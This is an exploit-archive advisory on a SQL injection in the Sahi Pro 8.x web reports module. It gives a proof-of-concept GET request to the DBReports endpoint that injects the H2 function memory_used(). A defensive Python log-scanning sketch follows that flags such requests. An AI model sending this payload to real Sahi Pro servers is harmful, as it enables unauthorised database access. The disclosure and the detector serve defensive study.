Sahi Pro 8.x SQL Injection Vulnerability / Exploit
Exploits / Vulnerability Discovered: 2019-06-18 | Type: webapps | Platform: multiple
This exploit / vulnerability, Sahi pro 8.x sql injection, is for educational purposes only; if you use it, you do so at your own risk!
An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A parameter in the web reports module is vulnerable to SQL injection. This can be exploited to inject SQL queries and run standard H2 system functions.
PoC:
Vulnerable URL:
# Replace <ip> and <port> with the IP and port of the remote Sahi Pro server machine.
# Here the SQL query is passed directly as part of the GET request, so it can be modified to run standard H2 database functions. In the following PoC, the "memory_used()" function is injected, and its result is reflected in the "status" column of the reports page.
http://<ip>:<port>/_s_/dyn/pro/DBReports?sql=SELECT DISTINCT memory_used() AS ROWSTATUS, SCRIPTREPORTS.SCRIPTREPORTID,SCRIPTREPORTS.SCRIPTNAME,SUITEREPORTS.* FROM SUITEREPORTS,SCRIPTREPORTS
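
A detection sketch for the request pattern above, added here as an example and not part of the original advisory or of Sahi Pro: it scans access-log lines for requests to the DBReports endpoint that carry an sql parameter and flags SQL function calls outside a small allow-list. The Common Log Format layout, the allow-list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter name are taken from the PoC URL on this page.
ENDPOINT = "/_s_/dyn/pro/DBReports"
PARAM = "sql"

# Common Log Format request field: "METHOD target HTTP/x.y" (assumed log layout).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# An identifier directly followed by "(" is a function call in the SQL text.
FUNC_CALL_RE = re.compile(r'\b([A-Za-z_][A-Za-z0-9_]*)\s*\(')
# Aggregates a report query could plausibly use (assumption; tune per site).
EXPECTED_FUNCS = {"count", "sum", "min", "max", "avg"}

def inspect_line(line):
    """Return a finding dict for a log line that hits the endpoint, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != ENDPOINT:
        return None
    values = parse_qs(parts.query).get(PARAM)  # parse_qs percent-decodes the value
    if not values:
        return None
    sql = values[0]
    funcs = sorted({f.lower() for f in FUNC_CALL_RE.findall(sql)} - EXPECTED_FUNCS)
    return {
        "client": m.group("ip"),
        "sql": sql,
        "unexpected_functions": funcs,
        # Any caller-supplied SQL deserves review; unexpected functions raise it.
        "severity": "high" if funcs else "review",
    }

# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jun/2019:10:00:01 +0000] "GET /_s_/dyn/pro/DBReports?sql=SELECT%20DISTINCT%20memory_used()%20AS%20ROWSTATUS%20FROM%20SUITEREPORTS HTTP/1.1" 200 512',
    '10.0.0.7 - - [18/Jun/2019:10:00:05 +0000] "GET /_s_/dyn/pro/DBReports?sql=SELECT+COUNT(*)+FROM+SUITEREPORTS HTTP/1.1" 200 128',
    '10.0.0.9 - - [18/Jun/2019:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 64',
]

def scan(lines):
    """Return the findings for every line that reaches the reports endpoint."""
    return [f for f in map(inspect_line, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because the endpoint accepts a full query by design, every hit is reported; restricting network access to the Sahi Pro port remains the stronger control where the reports module must stay enabled.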